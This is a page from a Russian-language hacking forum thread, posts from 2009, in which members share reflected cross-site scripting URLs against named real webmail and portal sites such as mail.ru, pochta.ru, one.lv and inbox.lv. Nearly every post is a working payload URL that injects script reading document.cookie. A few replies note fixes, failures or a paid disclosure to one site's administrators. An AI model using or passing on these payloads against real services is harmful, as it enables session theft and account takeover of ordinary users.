HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 28.09.2009, 06:16
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
 
Ответить с цитированием

  #62  
Старый 28.09.2009, 13:41
darkwkz
Участник форума
Регистрация: 18.03.2009
Сообщений: 130
Провел на форуме:
332909

Репутация: 103
Отправить сообщение для darkwkz с помощью ICQ
По умолчанию

one.lv
PHP код:
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
 
Ответить с цитированием

pochta.ru
  #63  
Старый 29.09.2009, 17:03
Details
Новичок
Регистрация: 28.09.2009
Сообщений: 2
Провел на форуме:
6089

Репутация: 0
По умолчанию pochta.ru

http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 
Ответить с цитированием

  #64  
Старый 29.09.2009, 17:39
Details
Новичок
Регистрация: 28.09.2009
Сообщений: 2
Провел на форуме:
6089

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ruslan1817  
мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E
Уже прикрыли))
 
Ответить с цитированием

  #65  
Старый 30.09.2009, 11:00
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.
 
Ответить с цитированием

  #66  
Старый 30.09.2009, 22:52
darkwkz
Участник форума
Регистрация: 18.03.2009
Сообщений: 130
Провел на форуме:
332909

Репутация: 103
Отправить сообщение для darkwkz с помощью ICQ
По умолчанию

inbox.lv забугорный сайтец.
http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

  #67  
Старый 05.10.2009, 20:19
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44
 
Ответить с цитированием

ыыыы
  #68  
Старый 06.10.2009, 04:39
Travakur555
Новичок
Регистрация: 14.09.2009
Сообщений: 7
Провел на форуме:
126690

Репутация: 0
По умолчанию ыыыы

Цитата:
Сообщение от Ruslan1817  
http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44
Чтот не рабочии твои хсс
 
Ответить с цитированием

  #69  
Старый 06.10.2009, 16:41
darkwkz
Участник форума
Регистрация: 18.03.2009
Сообщений: 130
Провел на форуме:
332909

Репутация: 103
Отправить сообщение для darkwkz с помощью ICQ
По умолчанию

Цитата:
http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28docum ent.cookie%29%3C/script%3E
сообщил администрации, в общем можно сказать получил 120 $ ))
 
Ответить с цитированием

  #70  
Старый 06.10.2009, 16:54
darkwkz
Участник форума
Регистрация: 18.03.2009
Сообщений: 130
Провел на форуме:
332909

Репутация: 103
Отправить сообщение для darkwkz с помощью ICQ
По умолчанию

Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
Там в поиске еще активка есть)

Последний раз редактировалось darkwkz; 06.10.2009 в 18:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ